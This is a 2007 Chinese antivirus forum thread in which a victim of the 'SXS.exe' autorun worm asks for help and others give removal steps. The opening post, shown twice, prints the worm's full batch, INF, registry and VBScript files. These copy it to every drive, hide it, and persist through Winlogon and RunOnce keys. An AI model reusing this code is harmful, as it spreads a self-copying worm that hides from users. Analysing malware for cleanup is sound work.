SXS.exe新变种求助~！！！

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛 SXS.exe新变种求助~！！！

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1 / 2 页

跳转页

dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:	发表于： 2007-05-14 01:32 \| 只看楼主短消息资料字号：小中大 1楼 SXS.exe新变种求助~！！！今天遇到一个病毒姑且叫他 SXS病毒　　　　首先杀掉怀疑进程再删注册表项(查找WScript.exe\sxs.exe 全部删除) 再删文件重启病毒重新出现. 　　不知道我漏删了什么. 　　下面是每个盘生成的四个文件. 　　autorun.bat 文件　　　　@echo off 　　if exist .\autorun.reg regedit /s .\autorun.reg 　　if not "%1"=="" goto open 　　if exist autorun.vbs start WScript.exe autorun.vbs&exit 　　　　';免杀　　if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit 　　';免杀　　　　　　　　　　　　:open 　　if not "%1"=="Open" goto next 　　start explorer .\ 　　exit 　　:next 　　if not "%1"=="Over" goto :next2 　　exit 　　:next2 　　if "%1"=="-" attrib -s -a -h -r %2\autorun.* 　　if "%1"=="-" attrib -s -a -h -r %2\sxs.exe 　　if "%1"=="+" attrib +s +a +h +r %2\autorun.* 　　if "%1"=="+" attrib +s +a +h +r %2\sxs.exe 　　:end 　　　　　　AutoRun.inf 文件　　　　[autorun] 　　shell\open=打开(&O) 　　shell\open\Command=WScript.exe .\autorun.vbs 　　shell\open\Default=1 　　shell\explore=资源管理器(&X) 　　shell\explore\Command=WScript.exe .\autorun.vbs 　　　　open=RavMon.exe 　　shellEXEcute=RavMon.exe 　　shell\Auto\command=RavMon.exe 　　　　　　　　autorun.reg 文件　　　　　　Windows Registry Editor Version 5.00 　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 　　"Userinit"="userinit.exe,autorun.bat" 　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 　　"autorun"="sxs.exe" 　　　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] 　　"ShowSuperHidden"=dword:00000000 　　"Hidden"=dword:00000002 　　　　　　autorun.vbs 文件　　on error resume next 　　Set WshShell =CreateObject("WScript.Shell") 　　　　if 1=0 then 　　else 　　For i=1 to 1 　　set Of = CreateObject("Scripting.FileSystemObject") 　　set dir = Of.GetSpecialFolder(1) 　　　　Set dc = Of.Drives 　　if WScript.ScriptFullName=dir&"\autorun.vbs" then 　　isdir=true 　　else 　　a=WshShell.Run("autorun.bat Open" ,0,False) 　　isdir=false 　　end if 　　For Each d In dc 　　If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then 　　a=WshShell.Run("autorun.bat - "&d ,0,True) 　　if isdir then 　　Of.CopyFile dir&"\autorun.bat",d&"\",True 　　Of.CopyFile dir&"\sxs.exe",d&"\",True 　　Of.CopyFile dir&"\autorun.inf",d&"\",True 　　Of.CopyFile dir&"\autorun.reg",d&"\",True 　　Of.CopyFile dir&"\autorun.vbs",d&"\",True 　　else 　　Of.CopyFile "autorun.bat",d&"\",True 　　Of.CopyFile "sxs.exe",d&"\",True 　　Of.CopyFile "autorun.inf",d&"\",True 　　Of.CopyFile "autorun.reg",d&"\",True 　　Of.CopyFile "autorun.vbs",d&"\",True 　　end if 　　a=WshShell.Run("autorun.bat + "&d ,0,True) 　　End If 　　next 　　if isdir then 　　wscript.sleep 60000 　　i=0 　　else 　　a=WshShell.Run("autorun.bat - "&dir ,0,True) 　　Of.CopyFile "autorun.bat",dir&"\",True 　　Of.CopyFile "sxs.exe",dir&"\",True 　　Of.CopyFile "autorun.inf",dir&"\",True 　　Of.CopyFile "autorun.reg",dir&"\",True 　　Of.CopyFile "autorun.vbs",dir&"\",True 　　a=WshShell.Run("autorun.bat + "&dir ,0,True) 　　End if 　　next 　　End if 2007-05-14 22:07:26.450000000
dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:	分享到：

dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:	发表于： 2007-05-14 01:38 \| 只看楼主短消息资料字号：小中大 2楼我被这个东西整不行了。谁救救我吧~
dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:

星月来了自信弱冠狮帖子:389 注册: 2007-05-06 来自:	发表于： 2007-05-14 01:43 \| 短消息资料字号：小中大 3楼先搜索注册表里的涉及的所有注册项（你最好先备份下），然后试试，将冰刃（1.2版本的）改名运行起来，然后用冰刃禁止进程创建，删除所有涉及的注册表项和所有磁盘里的你看到的那四个文件。试试吧。我睡了。还不行，你那系统里就还有其他的东西，那时再扫SRENG日志吧。发这里。等明天他们来看。
星月来了自信弱冠狮帖子:389 注册: 2007-05-06 来自:

sanjingshou 强壮不惑狮帖子:1166 注册: 2006-07-15 来自:	发表于： 2007-05-14 02:00 \| 短消息资料字号：小中大 4楼有以下几个位置： 1.%SYSTEMROOT%\system32\autorun.vbs %SYSTEMROOT%\system32\autorun.reg %SYSTEMROOT%\system32\autorun.bat %SYSTEMROOT%\system32\autorun.inf %SYSTEMROOT%\system32\sxs.exe 2.每个硬盘 3.修改注册表： [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 　　"Userinit"="userinit.exe,autorun.bat" 为： [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 　　"Userinit"="userinit.exe," 删除：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 　　"autorun"="sxs.exe" shell\open=打开(&O) 　　shell\open\Command=WScript.exe .\autorun.vbs 　　shell\open\Default=1 　　shell\explore=资源管理器(&X) 　　shell\explore\Command=WScript.exe .\autorun.vbs 如果运行以上，病毒会再出现---和我上次看到的有点不一样建议使用SRENG和ICESWORD配合使用。。。把每个病毒文件删除就不会出现再次感染的情况了，我处理过一次这类病毒，基本是一样的
sanjingshou 强壮不惑狮帖子:1166 注册: 2006-07-15 来自:

dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:	发表于： 2007-05-14 02:28 \| 只看楼主短消息资料字号：小中大 5楼病毒不运行时勾去显示隐藏文件有作用，但是一打开盘符（用右键点打开）或运行资源管理器，马上就取消显示隐藏文件。并且不显示受保护的系统文件。冰刃分析进程我分析一晚上嫩没找到。。。。。救命啊~我看最近网上好像这个也挺泛滥的。。。帮忙出个主意。。。
dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:

dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:	发表于： 2007-05-14 04:14 \| 只看楼主短消息资料字号：小中大 6楼我已经用文件粉碎器消灭了它。不容易啊。提醒其他中的XDJM，先关闭那个该死的W进程。用文件粉碎器！然后配合SRENG把启动项注册表给修复。再用卡卡把启动项里的AUTORUN去掉。。。哈哈！我太聪明了！哪位大大整个这个东西的免疫文件。我怕下次运气不好，弄不掉了。。
dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:

孤独更可靠锋芒艾服狮帖子:1788 注册: 2007-01-27 来自:	发表于： 2007-05-14 08:17 \| 短消息资料字号：小中大 7楼还有样本么. 比如说. 漏了一个...
孤独更可靠锋芒艾服狮帖子:1788 注册: 2007-01-27 来自:

姑苏残月叱咤花甲狮帖子:2464 注册: 2007-01-27 来自:	发表于： 2007-05-14 08:38 \| 短消息资料字号：小中大 8楼前几天就见过了.好象有反复感染的前兆.不好收拾. 个人建议删除文件等操作,请在安全模式下操作.如果能在PE环境下操作,效果更好
姑苏残月叱咤花甲狮帖子:2464 注册: 2007-01-27 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2007-05-14 09:17 \| 短消息资料字号：小中大 9楼这毒，确实难处理，建议有这毒的，都常向各家杀软上报，或许还能有机会修复感染的文件。同时也能加强杀软的监控能力。
天月来了版主帖子:76904 注册: 2007-02-06 来自:

强壮不惑狮

帖子:1166
注册: 2006-07-15
来自:

发表于： 2007-05-14 22:05 | 短消息资料

字号：小中大 10楼

引用:

【dxbstc的贴子】病毒不运行时勾去显示隐藏文件有作用，但是一打开盘符（用右键点打开）或运行资源管理器，马上就取消显示隐藏文件。并且不显示受保护的系统文件。
冰刃分析进程我分析一晚上嫩没找到。
。。。。救命啊~我看最近网上好像这个也挺泛滥的。。。
帮忙出个主意。。。
………………

那就不要运行，我的电脑，资源管理器，CMD
使用ICESWORD把我说的几个位置的病毒文件删除掉
再修改其注册表，就可以恢复

<<上一主题|下一主题>>

1 / 2 页

跳转页

dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:	发表于： 2007-05-14 01:32 \| 只看楼主短消息资料字号：小中大 1楼 SXS.exe新变种求助~！！！今天遇到一个病毒姑且叫他 SXS病毒　　　　首先杀掉怀疑进程再删注册表项(查找WScript.exe\sxs.exe 全部删除) 再删文件重启病毒重新出现. 　　不知道我漏删了什么. 　　下面是每个盘生成的四个文件. 　　autorun.bat 文件　　　　@echo off 　　if exist .\autorun.reg regedit /s .\autorun.reg 　　if not "%1"=="" goto open 　　if exist autorun.vbs start WScript.exe autorun.vbs&exit 　　　　';免杀　　if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit 　　';免杀　　　　　　　　　　　　:open 　　if not "%1"=="Open" goto next 　　start explorer .\ 　　exit 　　:next 　　if not "%1"=="Over" goto :next2 　　exit 　　:next2 　　if "%1"=="-" attrib -s -a -h -r %2\autorun.* 　　if "%1"=="-" attrib -s -a -h -r %2\sxs.exe 　　if "%1"=="+" attrib +s +a +h +r %2\autorun.* 　　if "%1"=="+" attrib +s +a +h +r %2\sxs.exe 　　:end 　　　　　　AutoRun.inf 文件　　　　[autorun] 　　shell\open=打开(&O) 　　shell\open\Command=WScript.exe .\autorun.vbs 　　shell\open\Default=1 　　shell\explore=资源管理器(&X) 　　shell\explore\Command=WScript.exe .\autorun.vbs 　　　　open=RavMon.exe 　　shellEXEcute=RavMon.exe 　　shell\Auto\command=RavMon.exe 　　　　　　　　autorun.reg 文件　　　　　　Windows Registry Editor Version 5.00 　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 　　"Userinit"="userinit.exe,autorun.bat" 　　　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 　　"autorun"="sxs.exe" 　　　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] 　　"ShowSuperHidden"=dword:00000000 　　"Hidden"=dword:00000002 　　　　　　autorun.vbs 文件　　on error resume next 　　Set WshShell =CreateObject("WScript.Shell") 　　　　if 1=0 then 　　else 　　For i=1 to 1 　　set Of = CreateObject("Scripting.FileSystemObject") 　　set dir = Of.GetSpecialFolder(1) 　　　　Set dc = Of.Drives 　　if WScript.ScriptFullName=dir&"\autorun.vbs" then 　　isdir=true 　　else 　　a=WshShell.Run("autorun.bat Open" ,0,False) 　　isdir=false 　　end if 　　For Each d In dc 　　If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then 　　a=WshShell.Run("autorun.bat - "&d ,0,True) 　　if isdir then 　　Of.CopyFile dir&"\autorun.bat",d&"\",True 　　Of.CopyFile dir&"\sxs.exe",d&"\",True 　　Of.CopyFile dir&"\autorun.inf",d&"\",True 　　Of.CopyFile dir&"\autorun.reg",d&"\",True 　　Of.CopyFile dir&"\autorun.vbs",d&"\",True 　　else 　　Of.CopyFile "autorun.bat",d&"\",True 　　Of.CopyFile "sxs.exe",d&"\",True 　　Of.CopyFile "autorun.inf",d&"\",True 　　Of.CopyFile "autorun.reg",d&"\",True 　　Of.CopyFile "autorun.vbs",d&"\",True 　　end if 　　a=WshShell.Run("autorun.bat + "&d ,0,True) 　　End If 　　next 　　if isdir then 　　wscript.sleep 60000 　　i=0 　　else 　　a=WshShell.Run("autorun.bat - "&dir ,0,True) 　　Of.CopyFile "autorun.bat",dir&"\",True 　　Of.CopyFile "sxs.exe",dir&"\",True 　　Of.CopyFile "autorun.inf",dir&"\",True 　　Of.CopyFile "autorun.reg",dir&"\",True 　　Of.CopyFile "autorun.vbs",dir&"\",True 　　a=WshShell.Run("autorun.bat + "&dir ,0,True) 　　End if 　　next 　　End if 2007-05-14 22:07:26.450000000
dxbstc 初生襁褓狮帖子:4 注册: 2007-05-14 来自:	分享到：

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 SXS.exe新变种 求助~！！！

SXS.exe新变种 求助~！！！

SXS.exe新变种 求助~！！！

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 SXS.exe新变种求助~！！！

SXS.exe新变种求助~！！！

SXS.exe新变种求助~！！！